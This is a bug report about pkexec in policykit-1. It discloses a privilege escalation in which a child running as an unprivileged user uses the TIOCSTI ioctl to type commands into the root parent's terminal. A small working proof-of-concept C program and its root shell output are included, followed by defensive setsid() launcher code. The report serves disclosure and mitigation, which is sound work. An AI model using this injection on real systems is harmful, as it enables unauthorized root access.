Package: policykit-1
Version: all
Severity: important
File: /usr/bin/pkexec

When executing a program via "pkexec --user nonpriv program", the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation. This issue has been fixed in "su" (CVE-2005-4890) by calling setsid() and in "sudo" by using the "use_pty" flag.

$ cat test.c
#include <sys/ioctl.h>

/* Proof of concept: push each byte of "id\n" into the input queue of the
 * terminal on fd 0 with TIOCSTI; the parent (root) shell reads it as if
 * it had been typed. */
int main()
{
 char *cmd = "id\n";
 while(*cmd)
  ioctl(0, TIOCSTI, cmd++);  /* TIOCSTI takes a pointer to one char */
 return 0;
}

$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# pkexec --user saken ./test ----> last command i type in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)


I don't believe any of the previous mentions of fixes for "su" and "sudo" work here, since executing a shell via pkexec would make it not have job control.
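The setsid() mitigation credited to "su" above, as an added example that is not part of the original report or of the PolicyKit code base: the kernel only honours TIOCSTI on a process's controlling terminal (otherwise the ioctl needs CAP_SYS_ADMIN), so a launcher that puts the unprivileged child in its own session, and thereby detaches it from the parent's tty, takes away the injection channel even though the child's fd 0 is still the same terminal. The helper names (run_detached, child_has_ctty, has_controlling_tty) are this example's own.

```c
/* Added example, not from the original report: launch a command in a new
 * session (setsid) so it has no controlling terminal, which is the "su"
 * fix for CVE-2005-4890 referenced above. Without a controlling tty the
 * child's ioctl(0, TIOCSTI, ...) is refused by the kernel. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if the calling process has a controlling terminal, else 0.
 * open("/dev/tty") only succeeds when a controlling tty exists. */
int has_controlling_tty(void)
{
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd < 0)
        return 0;
    close(fd);
    return 1;
}

/* Fork, detach the child from the caller's session with setsid(), then
 * exec argv. Returns the child's exit status, or -1 on error. */
int run_detached(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* A freshly forked child is never a process-group leader, so
         * setsid() succeeds and the child loses its controlling tty. */
        if (setsid() < 0)
            _exit(127);
        execvp(argv[0], argv);
        _exit(127);  /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Self-check: fork a child, optionally call setsid() in it, and report
 * whether it still has a controlling tty (1 = yes, 0 = no, -1 = error). */
int child_has_ctty(int detach)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (detach && setsid() < 0)
            _exit(2);
        _exit(has_controlling_tty());
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    int rc = WEXITSTATUS(status);
    return rc == 2 ? -1 : rc;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 2;
    }
    /* From an interactive terminal the first line prints 1, the second 0. */
    printf("child keeps ctty without setsid: %d\n", child_has_ctty(0));
    printf("child keeps ctty with setsid:    %d\n", child_has_ctty(1));
    return run_detached(argv + 1);
}
```

Run it from an interactive shell as `./launcher ./test` to see the detached child fail its TIOCSTI calls while a plain `./test` still injects into the parent's input queue. The trade-off is the one the report raises for pkexec: a detached child has no controlling terminal and therefore no job control, which is why "sudo" chose the "use_pty" route (a fresh pseudo-terminal that the child controls and that is separate from the caller's tty) instead of bare setsid().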

I'm also requesting a CVE for this issue.

Thanks,
Federico Bento
